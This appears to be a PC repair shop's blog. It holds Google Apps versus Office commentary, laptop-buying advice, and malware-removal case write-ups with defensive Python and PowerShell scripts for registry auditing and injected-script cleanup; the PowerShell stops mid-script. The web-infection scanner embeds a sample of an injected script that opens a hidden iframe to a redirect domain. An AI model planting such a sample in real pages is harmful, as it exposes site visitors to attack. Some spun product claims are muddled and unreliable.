Google Challenges Microsoft Office Suite for a Share of the Enterprise Application Industry – Part 2

Should distributed version control be designed into a word processor application? Why not just have an add-on for git, Mercurial, Subversion, or whatever?

Google Apps for Business collaboration isn’t only DVCS – it’s real time. I’ve seen Google Docs with double-digit simultaneous users. That’s a bit more appealing than a git add-on. Such an extension would call for regular commit, push, and pull of variations. Whether or not a git add-on could attain this capability, you continue to need another add-on for shared document management. Google Apps for Business collaboration functions out of the box, together with the extra advantage of the ability to make a file shareable with the entire internet almost immediately.

Is it a good idea to move away from on-premise Microsoft Exchange server designs to a more cloud-centric design similar to Google for Business?

We a short while ago worked with an organization who intended to employ Google Apps as a means to eradicate an on-premise Microsoft Exchange server environment. The on-premise MS Exchange Server had three basic defects: it did not communicate effectively with the community outside of the building, we lost all capability to connect by means of email during a protracted power outage despite the fact that we could nevertheless use the Internet, and backing up the data stores was a colossal balancing act of supervising sensitive incremental and differential backup jobs along with the inconsistent granular restore “elements”.

To begin, all individuals had the option to use the MS Outlook or Google Gmail interface without mandating either. At first, most people continued to utilize the Microsoft Outlook client since they were acquainted with the interface. The operations personnel were first to move to the Gmail web client as they all kept the purpose of increasing speed and effectiveness. Finance moved next for similar reasons. Much later, the sales and marketing departments moved to Gmail for a unique reason: they were making use of Google Docs to collaborate on assignments and needed to employ various Gmail – Google Docs integration capabilities. There are still various holdovers for MS Outlook; nonetheless, curiously, as individuals retire, so does their utilization of MS Outlook, as the new personnel generally want to use Gmail on account of familiarity.

Can you make an argument that Google Apps offer comparable functionality to Microsoft Office or MS Office 365 programs?

It’s easy: Google Apps are certainly not as feature rich as the MS Office suite of apps. Nobody who has used both MS Office/Microsoft’s online Office 365 and the Google Drive web applications (Docs, Sheets, and Slides) would ever attempt to claim that Google’s products are “superior”. But the issue for Microsoft is whether Google Drive is “adequate,” which it’s perhaps becoming. And it’s certainly a “simpler” solution in that having fewer features is of course less complicated.

But as web-based applications, Google Drive has usually suffered from an incredibly basic problem: they’re not created for offline utilization, so you must have an Internet connection to view, edit, or generate docs. But that’s changing. Last June, Google declared offline support for Google Drive, its word processor. And now Slides is additionally available for offline usage.

This functionality is significant for making Google Drive an acceptable solution for most end users, and it makes Google’s semi-preposterous Chromebook initiative practical. But such a device makes far more sense when there are truly useful applications accessible, especially when they may well be used offline.

In comparison to Google Drive, the Microsoft Office Wave supplies several advantages, but it’s fair to note that what Microsoft continues to disregard is the requirement for a free internet-centered productivity suite that may well be used offline. So while the MS Office Internet applications continue to be a superior offering to Google Drive overall in this coming update, they nevertheless do not provide offline access.

Posted in Google Apps V. MS Office 365

A close encounter involving the evaluation and removal of the potent and tricky FakeSysDef, aka Alureon, rootkit.

A client recently brought a laptop into the shop suffering from what was described as:

“I’m receiving the bogus HDD S.M.A.R.T. screens on my laptop notifying me to pay for a full license in an effort to do away with the infection on my hard disk. I also receive Avast! messages that a process called MAL interfered with the process explorer.exe on my Windows XP system. I performed a scan with Avast, which indicated an infected file, and a boot scan found the Alureon-K virus. After the reboot, everything was gone! Empty desktop, empty Software and empty data directories. The files are still there, though, because I ran several more scans which scanned all the docs.”

I have recently seen variants of FakeSysDef, aka Rogue.FakeHDD, strip a laptop bare like this. This malware stashes documents and shortcuts in temporary folders, so before anything else I scan the system with RogueKiller. RogueKiller located and repaired multiple registry entries that caused the bare desktop and missing Programs folder. More specifically, RogueKiller reset the registry entries HKCU\[...]\Advanced: Start_Show* from a value of 0 to 1.

Next I employ the valuable program OTL. I perform an OldTimer’s OTL scan on all users, and the resulting log suggests a few corrupt browser helper objects along with a suspect startup object: C:\Documents and Settings\%User%\Local Settings\Application Data\Google\Chrome\Application\chrome.exe. OTL additionally shows the location of the FakeHDD scanner: C:\Documents and Settings\%User%\Application Data\Microsoft\Internet Explorer\Quick Launch\SMART_HDD.lnk. I quickly produce an OTL fix script and apply the fix.

The OTL log additionally indicates an illegitimate mount point. I execute a scan and cure with TDSSKiller, and this effectively solves the issue. After this the laptop runs much smoother and Avast! no longer triggers an alarm.

A further concern arises with the Printers and Faxes folder, which is entirely empty. Attempting to add a printer produces the error: ‘Operation could not be completed. The print spooler service isn’t running’. Restarting the service manually is not successful. I attempt to fix the spooler service with the Clean Spooler tool, to no avail. The print spooler service file has been compromised and needs to be replaced. I use OTL to locate the original system file:


and the following command to restore the original file:

:Files
C:\WINDOWS\system32\spoolsv.exe|C:\WINDOWS\system32\dllcache\spoolsv.exe /replace

The spooler service is now back up and running, and the computer can once again access and print to all connected devices.

After confirming the operation of the PC I notice that Flash Player is not working or updating in the Firefox web browser. To proceed with this fix I first download the Adobe Flash uninstaller from the Adobe site. Once Flash Player has been removed I download the updated player from the Adobe website for both Internet Explorer and Firefox.

I attempt to verify the proper operation of the laptop again, and this time, via my checklist, I notice the Windows Update service won’t start – this PC is not receiving any Windows updates. For this fix I make use of the Farbar Service Scanner. Here is a little background on the service scanner:

Farbar Service Scanner is a small portable tool that enables you to detect internet connectivity problems owing to corrupted or missing Windows services. Certain malware, such as TDSS, may delete or corrupt Windows services, which would cause your computer to no longer have LAN connectivity. When FSS is run it displays a detailed report on the services, driver services, their configurations and the files that are responsible for network connectivity.

Farbar Service Scanner reports that the Windows security service has not started. I quickly produce a batch script to force clean up a few directories and restart these services:

rem stop the services that hold the update files open
net stop bits > junk.txt
net stop wuauserv >> junk.txt
rem unregister the Windows Update engine, purge the download cache and log, then re-register it
regsvr32 /u wuaueng.dll /s >> junk.txt
del /f /s /q %windir%\SoftwareDistribution\*.* >> junk.txt
del /f /s /q %windir%\windowsupdate.log >> junk.txt
regsvr32 wuaueng.dll /s >> junk.txt
rem bring the services back up
net start bits >> junk.txt
net start DcomLaunch >> junk.txt
net start RpcEptMapper >> junk.txt
net start wuauserv >> junk.txt
rem force a fresh client registration and detection cycle, list the running services, clear any WinHTTP proxy
wuauclt.exe /resetauthorization /detectnow >> junk.txt
net start >> junk.txt
netsh winhttp reset proxy >> junk.txt

After executing the script the Windows Update service still will not start. I like to employ my trusty Windows fix-it tool, Windows Repair (All In One), when faced with a computer as compromised as this. Windows Repair (All In One) effectively automates the process of running a check disk and the system file checker; it additionally repairs things such as file permissions and the Windows Update service.

After completing the scan and fix with Windows Repair (All In One) everything operates wonderfully: Windows Update functions properly and the PC is smooth and silent.

Posted in Virus, Malware And Spyware Removal

A closer look at the analysis and decontamination of the virulent and destructive FBI / DOJ MoneyPak ransomware trojan.

We recently encountered a version of the prevalent urausy.fbi.moneypack ransomware from a client who described the computer as: “My dad’s laptop obtained the Department of Justice MoneyPak virus. It states to be from the Department of Justice, nonetheless everything it says tells me it’s the FBI MoneyPak virus I got a couple of weeks ago, just under a different name. He uses an MS Windows XP PC. I would usually try to remedy it myself the way in which I fixed my laptop earlier, but I cannot get into safe mode or safe mode with networking. Whenever I try, the computer automatically reboots itself. I attempted googling help to fix this concern; however, now instead of restarting itself it goes into a blue screen of death”.

OK, eradicating this bad boy is going to be fun! Here is a quick summary of the virus: FBI MoneyPak malware is ransomware that displays a fraudulent FBI warning as part of its attempt to extract cash from the victim via MoneyPak. Although the FBI MoneyPak pop-up alert proclaims that your PC has been locked in connection with intellectual-property offenses (such as downloading illegal MP3s), the FBI MoneyPak ransomware is totally unconnected to the FBI and every other law enforcement organization. FBI MoneyPak will attempt to block all major applications while it is open; nonetheless an alternate boot method combined with an accurate anti-malware scan will eradicate it, and with it the lockout it causes. Although FBI MoneyPak tells its victims that paying will end the lockout, we discourage handing money over to the criminals behind it, since paying isn’t guaranteed to unlock your PC and is not necessary for removing FBI MoneyPak safely.

This modified version of the urausy.fbi.moneypack virus won’t let us into the OS by way of safe mode, so we approach the resolution by a different means. I begin with a bootable Windows installation DVD and a USB drive containing the Farbar Recovery Scan Tool. Booting from the Windows installation disc and running FRST from the USB drive enables me to sidestep the screen lock initiated by the virus. I next run FRST and review the log saved to the USB drive. The FRST log supplies a top-notch overview of the current state of the PC. The FRST log reveals numerous invalid startup records along with a compromised Winlogon Shell value. Additionally, the malware’s files had been saved in the Users\%user%\AppData\Roaming and C:\Users\%user%\Application Data folders. In this case the files of interest included skype.dat, skype.ini and a number of additional %random%.dll files.

I develop an FRST script and apply the fix via the USB drive. Upon completion of the fix the laptop is capable of booting into Windows normally. Next, I execute a quick scan and cleaning with AdwCleaner and RogueKiller. The AdwCleaner log indicates a single corrupt registry entry and the RogueKiller log indicates 5 compromised registry entries, including modifications to the DisableTaskMgr, DisableRegistryTools, and NewStartPanel values.
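The registry indicators that recur in this case and in the FakeHDD write-up above (Start_Show* zeroed under Explorer\Advanced, DisableTaskMgr and DisableRegistryTools set, a Winlogon Shell that no longer points at explorer.exe, desktop icons hidden under NewStartPanel) can be audited from a regedit export before any tool rewrites them, which gives you a record of what was changed. The script below is an added example and is not RogueKiller's, FRST's or the shop's own logic; the .reg text it parses is constructed for the demo (the skype.dat path echoes the file names found above), and the key paths are the standard Windows locations.

```python
"""Audit a regedit export (.reg text) for the lockout and persistence
indicators named in the FakeHDD and FBI MoneyPak write-ups.

Added example, not the shop's tooling.  SAMPLE_REG is constructed for the
demo; the key paths are the standard Windows locations."""
import re

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')

# Constructed export: per-user Winlogon Shell pointing at a dropped file,
# Task Manager and regedit disabled by policy, Explorer's Start_Show* flags
# zeroed (the FakeHDD "empty start menu" trick) and one desktop icon hidden.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="C:\\Users\\user\\AppData\\Roaming\\skype.dat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_ShowMyDocs"=dword:00000000
"Start_ShowRun"=dword:00000000
"Hidden"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]
"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=dword:00000001
"""


def _decode(raw):
    """Turn the right-hand side of a .reg value line into (type, data)."""
    raw = raw.strip()
    if raw.startswith('"') and raw.endswith('"'):
        # .reg files escape backslashes and quotes with a backslash
        return "REG_SZ", raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    if raw.lower().startswith("dword:"):
        return "REG_DWORD", int(raw[6:], 16)
    return "OTHER", raw          # binary/expand-string data: not needed here


def parse_reg(text):
    """Return {key_path: {value_name: (type, data)}} from .reg text."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if (m := KEY_RE.match(line)):
            current = m.group(1)
            keys.setdefault(current, {})
        elif current is not None and (m := VALUE_RE.match(line)):
            keys[current][m.group(1)] = _decode(m.group(2))
    return keys


def audit(reg_text):
    """Return (indicator, key, detail) tuples for every suspicious value."""
    findings = []
    for key, values in parse_reg(reg_text).items():
        k = key.lower()
        if k.endswith(r"\windows nt\currentversion\winlogon"):
            # Shell must be explorer.exe; anything else is how screen lockers
            # replace the desktop at logon.
            typ, shell = values.get("Shell", (None, None))
            if shell is not None and shell.strip().lower() != "explorer.exe":
                findings.append(("winlogon_shell", key, shell))
        elif k.endswith(r"\windows\currentversion\policies\system"):
            for name in ("DisableTaskMgr", "DisableRegistryTools"):
                if values.get(name) == ("REG_DWORD", 1):
                    findings.append(("tool_lockout", key, name))
        elif k.endswith(r"\windows\currentversion\explorer\advanced"):
            # Start_Show* = 0 hides start-menu items; users rarely zero these
            # themselves, so each one is flagged for review, not auto-reset.
            for name, data in values.items():
                if name.startswith("Start_Show") and data == ("REG_DWORD", 0):
                    findings.append(("start_menu_hidden", key, name))
        elif k.endswith(r"\explorer\hidedesktopicons\newstartpanel"):
            for name, data in values.items():
                if data == ("REG_DWORD", 1):
                    findings.append(("desktop_icon_hidden", key, name))
    return findings


if __name__ == "__main__":
    for indicator, key, detail in audit(SAMPLE_REG):
        print(f"{indicator:20} {detail}\n{'':20} in {key}")
```

On a live machine the same audit runs against `reg export` output of HKCU and HKLM taken from the recovery environment's offline hive, so the comparison is against the state the malware left, not the state after a cleaner has already rewritten it.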

The virus did significant damage to the OS, so for the next step I run ComboFix, a potent recovery tool. The ComboFix log indicates several more deletions of files located in the C:\ProgramData folder. Furthermore, I produce a quick ComboFix script to clear the Java cache on the infected computer.

Aside from a slow IE browser, the computer functions much smoother now. In order to repair IE I open Internet Options and, under the Advanced tab, choose to reset IE. After the reset IE runs much smoother.

This computer operates practically perfectly now. I execute one last scan with Malwarebytes. The MBAM logs come back negative, indicating a clean laptop.

Posted in Virus, Malware And Spyware Removal

Buying a Notebook That Won’t Include MS Windows 8.

We were recently posed this query, and it’s an excellent one, from one of our very good clients:

“I am just starting to look for a PC for school, and the only thing I manage to find are laptops or netbooks which have MS Windows 8. I have utilized MS Win 7 for an extended time now, and would not have difficulty giving it up, however not for MS Win 8. After visiting some main online retail sites, I have observed that finding either an MS Win 7 notebook, or even a PC without an operating system, is practically impossible. So where must I go if looking for laptops sans OS, or at the very least sans MS Windows 8?”

Win 8: Missing a Start Menu

You have numerous options available. First I’ll address the biggest complaint we receive about Win 8: the lack of a start button. If you’re anything like me you keep your desktop clean, and nearly exclusively use the start button to access programs. I do not like clutter, and only use my desktop for a couple of widgets and short-term file storage. The start button is vastly better for running multiple tasks than a desktop: the desktop is already concealed by the programs that are already open, and I do not want to have to go back to it just to open a new program.

This isn’t the end of the world. Doing Windows support as a profession, I use the new and old Windows versions all the time. I run MS Windows 8 at work, Win 7 at home. MS Win 8 is fine, once you get a Windows start menu back.

If you really require a Windows start menu, multiple alternatives exist for adding one to Microsoft Win 8. Start8 is my favorite and costs $5. StartIsBack costs $3 and essentially restores the Windows start menu; the code is still in Microsoft Win 8, at least most of it. Classic Shell is, needless to say, free and functions fine; I just do not care for it as much.

Downgrading MS Win 8 to MS Win 7

Numerous people consider purchasing an MS Windows 8 machine and re-installing Microsoft Win 7 onto it a feasible option. But a wipe and reinstall of Microsoft Windows 7 isn’t inexpensive. Microsoft Win 7 isn’t given away, and if you do not have an old non-OEM edition lying around it can cost you. Actually, the reason so many individuals have Windows is simply because it comes free or close to free with PCs. If individuals ever had to pay complete non-OEM prices then it would die quickly. Generally, sticking to whichever OS the notebook came with will give you the least amount of trouble.

Current hardware supports Microsoft Windows 7 just fine, but releasing customized versions (the customizations are necessary for things like battery life optimization) of MS Win 7 drivers is costly and time-consuming. A lot of suppliers just won’t bother unless they’re still selling the same equipment with Microsoft Windows 7 anyway, or supply an official downgrade option (like Dell or Lenovo on their enterprise models).

If you just download a generic driver from Intel, nVidia, ATi or the like you typically won’t get everything your equipment has to deliver – be it things like OSDs for display of volume/brightness or battery life. For instance, installing all original Intel drivers straight from the manufacturer on a ThinkPad instead of the Lenovo custom-made drivers may well reduce your battery life by about 40% – it’s a huge difference.

Distributors of MS Win 7 Machines

Dell supplies enterprise machines with Microsoft Windows 7. I recommend the XPS 13. You can go to their enterprise website, pick laptops, and check the box for Microsoft Windows 7.

I additionally recommend Lenovo ThinkPads. I recently put together a W530 with a 1920×1080 screen, one of the few you will discover outside Apple. It has excellent Linux support, even down to the crazy fingerprint scanner. I easily get 7 hours or so on the battery with the recommended tweaks. There’s a whole wiki just for ThinkPad stuff. It ships with Win 7, but you never have to boot into Windows. You can blow away the complete drive, “recovery” and “boot” partitions included, and never look back. It has a standard BIOS as well as UEFI (disabled by default; leave it that way), so you should never have any issues there. It’s a tank, it’s not very sexy like an ultrabook, but it’s great if you want a desktop-fast, Linux-friendly workstation notebook.

Linux Alternatives

System76 sells and ships laptops, desktops, and servers with Ubuntu. If you’re a Linux user or feel as if you are ready to take the plunge, this is a fantastic place to start. At least their systems are entirely Linux compatible. Even if you really don’t like Ubuntu and have some other pet distribution, it has a better chance of working on one of these than if you get a Windows PC and wipe the hard drive to install Linux.

Windows 8 – Is It Really That Bad?

Honestly, not much has changed. Actually, the largest change in Win 8 is that I have to press the Windows key when I log on in order to reach the desktop. I still just hit Win+R for the “Run” prompt, or click a shortcut in the variety of places I’ve aggregated them, which make far more sense than a Microsoft Windows 7 or MS Windows 8 start button layout.

I will say I don’t hate MS Windows 8. A few things I like about Microsoft Windows 8: low memory and disk footprint; easier access to commonly used functions (mouse to the far bottom left, right click; works with Start8 too); an effective copy dialog that even shows instant rather than average transfer rates (a pretty nice feature to have, yet shockingly MS Win 8 is the only OS that does it); enhanced Explorer features like, e.g., “admin console here”, and built-in support for mounting ISOs. With MS Win 7 you have to add these in on your own; with Microsoft Windows 8 they are already there.

I am in whole agreement that there is no reason to upgrade from Windows 7 to MS Win 8. However, if you get Windows 8, it’s not the end of the world. It’s quick and secure, and it has some improvements I like; the new Task Manager is quite nice. It runs every program I have tried on it that also ran on 7 (and I’ve tried a lot), and it isn’t difficult to use.

For that matter, even the new start menu is perfectly usable; it’s just clunkier than what it replaced. It isn’t hard to use, just slower and inelegant. Perfectly usable though; we leave it on the 2012 servers we have.

Deals on Win 7 Devices

If you happen to be set on a Win 7 machine and have a little bit of time to hunt for bargains, my best suggestion is to get an account at fatwallet.co. (a coupon and deal aggregator website), and set up a “topic alert” where you get emails sent to you whenever a good deal with a specific keyword appears (I used “i5” in addition to “14.1” as keywords for my last notebook). Also frequently visit Slickdeals, as they have a nicer layout and faster response time for sales of limited quantity. It is almost always these deal aggregator sites that pick up the best limited-quantity clearance sales (which may well almost always be Win7 nowadays).

Posted in Is Windows 8 Really That Bad?

Google Challenges Microsoft Office Suite for a Share of the Enterprise Application Industry – Part 1

Over a number of years Google Apps for Business incrementally (and in some cases not so slowly) bit into MS’ monopoly on business application distribution. Affordable pricing plans and simple integration sparked Google’s validation inside the enterprise application sector. Google Apps costs $50 per year per person using its Google Apps for Business products. Google Apps for Business also delivers a selection of integration resources which effectively migrate Microsoft Office products to Google cloud-centered systems.

We spoke with Corey O’Neill of Liquid Team, a top web development & technology solutions firm specializing in Internet, Extranet, Intranet, eCommerce & mobile solutions, to understand what she thinks of the enhanced Google offerings.

We’ve read complaints that the Google spreadsheet and word processor programs don’t wholly satisfy professional workflow demands. Do you suppose Google Apps product offerings will be able to replace MS and/or Word?

It’s accurate. The Google Apps Spreadsheet software lacks capabilities, such as pivot tables, critical to some business professionals. I’ve noticed a lot of businesses use Google Apps for Business exclusively to share Microsoft Office documents. It’s simply a matter of time before Google Apps Spreadsheets catch up with Excel and wipe out the requirement to create documents in one environment and share them in another – in due course enterprises will remove the added step from their workflow. Enterprises nevertheless count on Microsoft Server/Windows RDS CALs, MS Office Volume CALs, Citrix CALs and Active Directory CALs so that staff are able to keep productive while away from the workplace. The cost of licenses will start to accumulate and I presume that’s why we’ve seen the emergence of MS Office 365 – to contend with Google at the mobile enterprise level.

Does MS deliver the same effortless collaboration that Google Apps delivers?

Microsoft faces problems with an increasing amount of business communication never going through paper; the majority of the essential MS Office elements are actually not very vital in comparison to effortless collaboration. In fact, their presence just makes the products much more complicated.

I imagine most contemporary enterprise consumers opt for MS on account of SharePoint. In my opinion Google Apps for Business collaboration features surpass SharePoint.

We’ve witnessed many case studies in which Microsoft SharePoint has not been implemented correctly. I’ve seen full document versions vanish, for example. In many cases, end users have difficulty adhering to the check-in and check-out protocols. So end users end up creating their own methodologies in order to get things to work for them, for instance keeping multiple copies of a single document and giving each new version a different name than the previous one – this genuinely defeats the objective of MS SharePoint.

On the other hand, collaboration within Google Apps for Business works right out of the box.

If you happen to be considering including Google into your business workflow you may learn more about our Google Apps for Business integration services.

Posted in Google Apps V. MS Office 365

A close encounter involving the examination and excision of the JS:Iframe-FG JavaScript virus.

A business associate stopped by the PC shop not long ago. He expressed serious concerns about a probable malicious takeover of his online business website. Moreover, he required some assistance examining new malware alerts originating from his anti-malware software, Avast!. The application warned of infection by the JS:Iframe-FG [Trj] malware. He went on to explain that none of his internet browsers would open his company website. Furthermore, the anti-virus packages installed on his clients’ computers showed an infection located within the website.

My first action is reviewing the website with a number of third-party analysis resources, including the Zulu URL Risk Analyzer and URLVoid. The Zulu review verifies that many anti-virus applications consider his website harmful – this isn’t good for business. The URLVoid log comes back positive, confirming the presence of the JS:Iframe-FG trojan hack.

A brief history: Trojan:JS:Iframe is a malicious JavaScript that is embedded as an IFrame in hacked websites, commonly by way of SQL injection, or as a result of blackhat search engine optimization poisoning. When opened in a browser, the virus redirects the browser to an alternative website.

The next step calls for finding the origin of the malware. In many instances, the purpose of an iframe injection hack is redirecting the web browser from one website to another. I execute a further scan of the website, this time using urlquery.net. The report shows a browser redirect to the domain couchtarts(dot)com. Based on the virus description and redirect location, I can deduce the fingerprint of the unwanted JavaScript code. I search through the files on the web server for all occurrences of “var _q” and remove all accompanying JavaScript.

We change the credentials for the web server and the content manager, and the site now functions seamlessly.
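The fingerprint search and script removal described above, as an added example that is not part of the original post or the shop's own procedure: it scans a web root for `<script>` blocks carrying the “var _q” fingerprint, reports any domain they reference (checked against the couchtarts(dot)com redirect target from the urlquery report), and strips only those blocks so legitimate scripts keep loading. The web root here is a constructed in-memory dictionary standing in for the server's files; the page names no server-side language, so Python is an assumption.

```python
"""Find and strip the injected <script> blocks described in the
JS:Iframe-FG write-up.

Added example, not the shop's procedure.  The "var _q" fingerprint and the
couchtarts(dot)com redirect target come from the write-up; SAMPLE_SITE is a
constructed web root (path -> file content) standing in for the real server."""
import re
from urllib.parse import urlparse

# \b after _q keeps a legitimate "var _quote" from matching the fingerprint.
FINGERPRINT_RE = re.compile(r"\bvar\s+_q\b")
KNOWN_REDIRECT_DOMAINS = {"couchtarts.com"}            # from the urlquery report
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""", re.IGNORECASE)

SAMPLE_SITE = {
    "index.html": (
        "<html><head><title>Shop</title>\n"
        '<script src="/js/site.js"></script>\n'
        "</head><body><h1>Welcome</h1>\n"
        # the injected block: a 1x1 iframe created at page load
        "<script>var _q = document.createElement('iframe');"
        "_q.src='http://couchtarts.com/in.cgi?3';_q.width=1;_q.height=1;"
        "document.body.appendChild(_q);</script>\n"
        "</body></html>"
    ),
    # legitimate code that merely contains the letters "var _q"
    "about.html": "<html><body><p>About</p><script>var _quote = 1;</script></body></html>",
    "js/site.js": "function q() { return 1; }",
}


def _script_blocks(path, content):
    """HTML files yield each <script> body; .js files are one block."""
    if path.lower().endswith(".js"):
        return [content]
    return SCRIPT_RE.findall(content)


def scan_file(path, content):
    """Return one finding per fingerprinted script block in this file."""
    findings = []
    for block in _script_blocks(path, content):
        if not FINGERPRINT_RE.search(block):
            continue
        hosts = set()
        for url in URL_RE.findall(block):
            host = urlparse(url).hostname
            if host:
                hosts.add(host.lower())
        findings.append({
            "path": path,
            "snippet": block.strip()[:80],
            "domains": sorted(hosts),
            "known_redirect": bool(hosts & KNOWN_REDIRECT_DOMAINS),
        })
    return findings


def scan_site(files):
    """files: {relative_path: content}.  Returns all findings, path-sorted."""
    return [f for path in sorted(files) for f in scan_file(path, files[path])]


def strip_injected_scripts(html):
    """Remove fingerprinted <script> blocks from HTML; returns (html, count).
    Other scripts are left untouched, so a legitimate site.js keeps loading."""
    removed = 0

    def repl(m):
        nonlocal removed
        if FINGERPRINT_RE.search(m.group(1)):
            removed += 1
            return ""
        return m.group(0)

    return SCRIPT_RE.sub(repl, html), removed


if __name__ == "__main__":
    for hit in scan_site(SAMPLE_SITE):
        print(f"{hit['path']}: references {hit['domains']} "
              f"(known redirect target: {hit['known_redirect']})\n  {hit['snippet']}")
    cleaned, n = strip_injected_scripts(SAMPLE_SITE["index.html"])
    print(f"removed {n} injected block(s) from index.html")
```

On a real server, read each file's text into the same `{path: content}` shape, keep a copy of every original before writing a cleaned version back, and treat the credential change the post finishes with as part of the fix: removing the iframe does not close the path by which it was planted.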

Posted in Virus, Malware And Spyware Removal

Pages from the lab book of a PC tech: analysis and eradication of the destructive Trojan.Win32.Weelsof virus.

A new associate came by the office yesterday, carrying her suffering computer along with her. She described regular warnings from her anti-virus software, Avast!, showing possible infection within the C:\ProgramData directory. She added that the alerts pointed out dodgy processes attempting to use system resources to communicate with an external website: urbangood.info.

I’ll take a quick moment here to bring up the anti-virus software Avast!. I recommend Avast! to every one of my customers and family. I include it in a collection of essential tools I use on a day-to-day basis when repairing computers. It’s easy to see why Avast! retains very high ratings on the CNET software download website. Not only does the staff regularly update the software with the most current virus definitions, but the user support is nearly unrivaled.

Alright, proceeding with the fix. To begin with, I update and carry out a quick scan with the anti-virus software, Ikarus, currently installed on the system. Confirmed: the Ikarus analysis indicates the presence of the Trojan.Win32.Weelsof trojan.

A quick word concerning Trojan.Win32.Weelsof, the formal name of a malicious trojan linked with notorious ransomware such as the Ukash virus, known for intimidating computer users into paying cash to have control of their computers returned. The functionality of the malware includes spying on the infected PC, sending out confidential information, and installing or executing other malware from a remote server.

Indications of infection include computer operations slowing to a halt in addition to the occurrence of dodgy files and processes located specifically in the C:\ProgramData directory. Numerous computer users acquire the malware through:

1. Drive-by scripts located on compromised shareware and freeware sites, downloaded to the computer without knowledge or consent.
2. Clicking suspicious pop-ups or hyperlinks.
3. Opening email attachments from unidentified origins.

I proceed to download, to the afflicted computer, my array of handy PC repair tools, which include Avast!, OTL, ComboFix, Malwarebytes and TDSSKiller. The first action toward eliminating this virus is performing an OTL diagnostic. The OTL analysis reveals unwanted files located in the C:\ProgramData and C:\Users\[user]\AppData\Roaming directories, Alternate Data Streams in the C:\ProgramData and C:\Users\[user]\AppData\Local directories, and needless web browser toolbars. Taking into account the latest malware definitions, I’m relatively positive the dodgy files and Alternate Data Streams in C:\Users\[user]\AppData\Roaming and C:\Users\[user]\AppData\Local were not created by the Trojan.Win32.Weelsof virus – they need elimination nevertheless.

I produce an OTL script and run the fix. The OTL log indicates a clean system.

I restart the PC and it operates faultlessly.

Posted in Virus, Malware And Spyware Removal

On-the-job experience with and eradication of the effective TDL4 malware.

Recently a person brought in a laptop troubled with, as he referred to it, “the ever-present blue screen of death”. He went on to clarify that the computer, at first, would on occasion display an error screen, primarily after at least an hour of usage; however recently the PC showed a stop error at the time of each log in. He tried various anti-malware scans, in safe mode, with Malwarebytes and Avast. After the scans and a reboot the computer booted immediately to a black screen with nothing but a mouse cursor displayed on the monitor. He needed help.

This computer would not boot correctly, so in order to analyze and fix boot issues we employ a tool developed to run in the Windows Recovery Environment. In such cases, we perform a diagnostic scan using the Farbar Recovery Scan Tool from a USB drive. The FRST analysis exposes infection by the TDL4 rootkit.

TDL is a robust rootkit and botnet. TDL employs a variety of techniques to evade all types of detection, and uses encryption to protect transmission between its bots and the botnet command center. TDL also consists of a potent rootkit component that permits it to hide the existence of other types of malware on the computer. Left unchecked, TDL might trigger complete system failure.

After that, I develop a simple FRST fixlist script and run this file from the flash drive. The FRST log reveals successful completion of the operation.

The laptop is still not able to boot into normal mode, so we move forward with a ComboFix scan inside safe mode. The ComboFix log shows numerous things. First, the infected computer has lingering registry items from uninstalled anti-virus and spyware software. In this case, it turned out McAfee was sticking around – this is an undesirable scenario because these kinds of remnants may conflict with recovery programs, such as ComboFix, which was now displaying an error, and future anti-virus software packages. It’s important to be aware that just one anti-virus program should be installed on the PC at any time. Next, the ComboFix log reveals successful removal of malware which stayed undetectable under TDL4. In this case, the applications are located in the following directories: C:\Users\[user]\AppData\Local, C:\Users\Elliot\AppData\Roaming, and C:\Windows. ComboFix sufficiently cleans this spyware and adware. I create a small ComboFix script that erases the lingering McAfee registry records.

The PC is still unable to start up into normal mode, consequently we move forward with an analysis using TDSSKiller. The TDSSKiller report indicates successful detection and eradication of a suspicious hard drive partition.

After the TDSSKiller repair completes, the PC boots into Normal mode without issues.

Rootkits like this dig deep into the operating system, so we continue with a more thorough investigation of the laptop using OTL. The OTL report reveals a number of hidden system files in the C:\Users\Elliot\AppData\Local and C:\ProgramData directories. Hidden system files should not be found here, so we write an OTL script to remove these unwanted executables. The resulting OTL report shows a clean laptop!
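As an added example (not from the original post, and not OTL's own logic), the following PowerShell script enumerates executables that carry the Hidden plus System attribute pair under the two locations the OTL report flagged, and records their signature status and SHA256 so each one can be reviewed before any removal. The roots and the extension list are assumptions; adjust them for the profile being examined.

```powershell
# Added example, not from the original post: report hidden+system executables
# under the user's AppData\Local and under ProgramData. Read-only; nothing is
# deleted. $Roots and $Extensions are assumptions for illustration.
$Roots = @(
    $env:LOCALAPPDATA,   # e.g. C:\Users\<user>\AppData\Local
    $env:ProgramData     # e.g. C:\ProgramData
)
$Extensions = @('.exe', '.dll', '.sys', '.scr', '.cpl')
$Flags = [IO.FileAttributes]::Hidden -bor [IO.FileAttributes]::System

$Findings = foreach ($Root in $Roots) {
    if (-not (Test-Path -LiteralPath $Root)) { continue }
    # -Force is required, otherwise hidden and system files are skipped entirely
    Get-ChildItem -LiteralPath $Root -Recurse -Force -File -ErrorAction SilentlyContinue |
        Where-Object {
            (($_.Attributes -band $Flags) -eq $Flags) -and
            ($Extensions -contains $_.Extension.ToLower())
        } |
        ForEach-Object {
            $Sig = Get-AuthenticodeSignature -FilePath $_.FullName
            [pscustomobject]@{
                Path      = $_.FullName
                SizeKB    = [math]::Round($_.Length / 1KB, 1)
                Modified  = $_.LastWriteTime
                Signature = $Sig.Status      # Valid, NotSigned, HashMismatch, ...
                Signer    = if ($Sig.SignerCertificate) { $Sig.SignerCertificate.Subject } else { '' }
                SHA256    = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
            }
        }
}

if ($Findings) {
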